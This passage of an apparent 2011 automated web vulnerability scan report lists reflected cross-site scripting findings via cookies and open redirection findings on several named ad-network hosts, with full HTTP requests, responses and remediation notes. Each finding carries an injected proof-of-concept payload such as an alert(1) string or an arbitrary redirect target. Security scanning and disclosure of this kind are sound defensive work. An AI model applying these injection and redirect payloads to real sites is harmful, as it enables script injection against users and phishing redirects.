function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-55689212_1304957015","http://ad.doubleclick.net/adj/q1.q.gc.6008/be_ent;net=q1;u=,q1-55689212_1304957015,11f8f328940989efeef7';alert(1)//7c3e7a3ab5b,ent,am.h-am.b;;sz=728x90;net=q1;ord1=89470;contx=ent;dc=w;btg=am.h;btg=am.b;ord=957008422?","728","90",false);</scr'+'ipt>
...[SNIP]...

2.91. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_life

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f6c9'%3balert(1)//9a6c2150542 was submitted in the cli cookie. This input was echoed as 1f6c9';alert(1)//9a6c2150542 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008/be_life;sz=728x90;net=q1;ord=957064653;ord1=489085;cmpgurl=http%253A//www.courier-journal.com/section/FEATURES? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e1f6c9'%3balert(1)//9a6c2150542; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:41 GMT
Connection: close
Content-Length: 7248

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-26682929_1304957081","http://ad.doubleclick.net/adj/q1.q.gc.6008/be_life;net=q1;u=,q1-26682929_1304957081,11f8f328940989e1f6c9';alert(1)//9a6c2150542,food,am.h-am.b;;sz=728x90;net=q1;ord1=489085;contx=food;dc=w;btg=am.h;btg=am.b;ord=957064653?","728","90",false);</scr'+'ipt>
...[SNIP]...

2.92. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/life

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eae2d'%3balert(1)//4c8cc42803f was submitted in the cli cookie. This input was echoed as eae2d';alert(1)//4c8cc42803f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008/life;sz=728x90;net=q1;ord=957049792;ord1=491627;cmpgurl=http%253A//www.courier-journal.com/section/FEATURES? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989eeae2d'%3balert(1)//4c8cc42803f; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:29 GMT
Connection: close
Content-Length: 7245

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-53639543_1304957069","http://ad.doubleclick.net/adj/q1.q.gc.6008/life;net=q1;u=,q1-53639543_1304957069,11f8f328940989eeae2d';alert(1)//4c8cc42803f,food,am.h-am.b;;sz=728x90;net=q1;ord1=491627;contx=food;dc=w;btg=am.h;btg=am.b;ord=957049792?","728","90",false);</scr'+'ipt>
...[SNIP]...

2.93. http://optimized-by.rubiconproject.com/a/7476/12017/24449-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7476/12017/24449-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4375"-alert(1)-"6fff19ba843 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7476/12017/24449-15.js?cb=0.17332485876977444 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; cd=false; ruid=f4375"-alert(1)-"6fff19ba843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=12590^2&13549^1&5032^6; csi2=3164882.js^2^1304954981^1304955491&3187892.js^3^1304955417^1304955486&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:03:06 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7476/12017; expires=Mon, 09-May-2011 17:03:06 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 17:03:06 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1&12590^2&12017^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=57413; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3159511.js^1^1304956986^1304956986&3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 16:03:06 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2304

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3159511"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=f4375"-alert(1)-"6fff19ba843\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3. Open redirection

There are 4 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:


3.1. http://ad.trafficmp.com/a/bpix [r parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//aa91a5a1616efcf62/a%3f was submitted in the r parameter. This caused a redirection to the following URL:

Request

GET /a/bpix?adv=1107&id=1&r=http%3a//aa91a5a1616efcf62/a%3f HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; dly2=3-lkkjy3-P~hoc~0~1uo0~1-; dmg2=2-null7566%4050%4057+53%3A01%3A72%3ANZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; hst2=3-lkkjy3-1~70y9vrnt7vq8~146z~2ihm~0-; pct=1-oevyvt~gn7ey36j-vOrunivbe~gn7ey36i-yhpvq~gn7ey36j-; T_57ms=gj9%3Ax0sc%3A1; rth=2-ljzkpb-gj9~x0sc~1~1-ahc~ljs1~1~1-g9g~lg1x~1~1-g9c~ld22~1~1-gyx~kz8s~1~1-jxb~e876~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 09 May 2011 16:02:38 GMT
Location: http://aa91a5a1616efcf62/a?
Connection: close
Set-Cookie: T_57ms=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_s25=ahc%3Ay6j4%3A1; Domain=trafficmp.com; Expires=Tue, 08-May-2012 16:02:39 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-ahc~y6j4~1~1-gj9~x0sc~1~1-g9g~lg1x~1~1-g9c~ld22~1~1-gyx~kz8s~1~1-jxb~e876~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 08-May-2012 16:02:39 GMT; Path=/
Content-Length: 0


3.2. http://b.scorecardresearch.com/r [d.c parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The value of the d.c request parameter is used to perform an HTTP redirect. The payload http%3a//a3630daff24e7798f/a%3fgif was submitted in the d.c parameter. This caused a redirection to the following URL:

Request

GET /r?c2=6036462&d.c=http%3a//a3630daff24e7798f/a%3fgif&d.o=tribglobal&d.x=251887733&d.t=page&d.u=http%3A%2F%2Fwww.latimes.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://a3630daff24e7798f/a?gif
Date: Mon, 09 May 2011 16:03:11 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 16:03:11 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


3.3. http://core.insightexpressai.com/adServer/adServerESI.aspx [redir parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The value of the redir request parameter is used to perform an HTTP redirect. The payload http%3a//a6f99f48ddccfc543/a%3fhttp%3a//core.insightexpressai.com/adserver/1pixel.gif was submitted in the redir parameter. This caused a redirection to the following URL:

Request

GET /adServer/adServerESI.aspx?bannerID=178140&script=false&redir=http%3a//a6f99f48ddccfc543/a%3fhttp%3a//core.insightexpressai.com/adserver/1pixel.gif HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Acourier-journal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074; IXAIBanners2554=175183; IXAIBannerCounter175183=1; IXAIControlCounter2554=1; lastInvite=4%2f23%2f2011+4%3a30%3a01+PM; IXAIinvited2554=true; IXAIBannerCounter174602=1; IXAIFirstHit2460=4%2f23%2f2011+4%3a31%3a40+PM; IXAIBanners2460=174602,174595; IXAIBannerCounter174595=1; IXAILastHit2460=5%2f2%2f2011+2%3a16%3a33+PM; IXAICampaignCounter2460=2; IXAIFirstHit2579=5%2f2%2f2011+1%3a51%3a33+PM; IXAIBanners2579=178140,178140; IXAIBannerCounter178140=2; IXAILastHit2579=5%2f9%2f2011+9%3a51%3a44+AM; IXAICampaignCounter2579=2; IXAIBanners2708=178563; IXAIBannerCounter178563=1; IXAIFirstHit2708=5%2f9%2f2011+10%3a48%3a33+AM; IXAILastHit2708=5%2f9%2f2011+10%3a48%3a33+AM; IXAICampaignCounter2708=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/7.0
Content-Length: 153
Content-Type: text/html
Location: http://a6f99f48ddccfc543/a?http://core.insightexpressai.com/adserver/1pixel.gif
Set-Cookie: IXAIBanners2579=178140,178140,178140; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIBannerCounter178140=3; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAILastHit2579=5%2f9%2f2011+12%3a03%3a51+PM; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAICampaignCounter2579=3; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 16:03:49 GMT
Pragma: no-cache
Date: Mon, 09 May 2011 16:03:49 GMT
Connection: close
Cache-Control: no-store

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

3.4. http://d.xp1.ru4.com/activity [redirect parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /activity

Issue detail

The value of the redirect request parameter is used to perform an HTTP redirect. The payload .ad31e179b3a15cf75/ was submitted in the redirect parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /activity?_o=62795&_t=cm_admeld&redirect=.ad31e179b3a15cf75/&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AM-00000000030620452; O1807966=16; P1807966=c3N2X2MyfFl8MTMwNDM2MDM2MHxzc3ZfYnxjMnwxMzA0MzYwMzYwfHNzdl8xfDI4NTQ0NTQ3M3wxMzA0MzYwMzYwfA==

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 09 May 2011 16:03:36 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: O62795=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Location: http://.ad31e179b3a15cf75/?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match
Content-length: 0
Connection: close

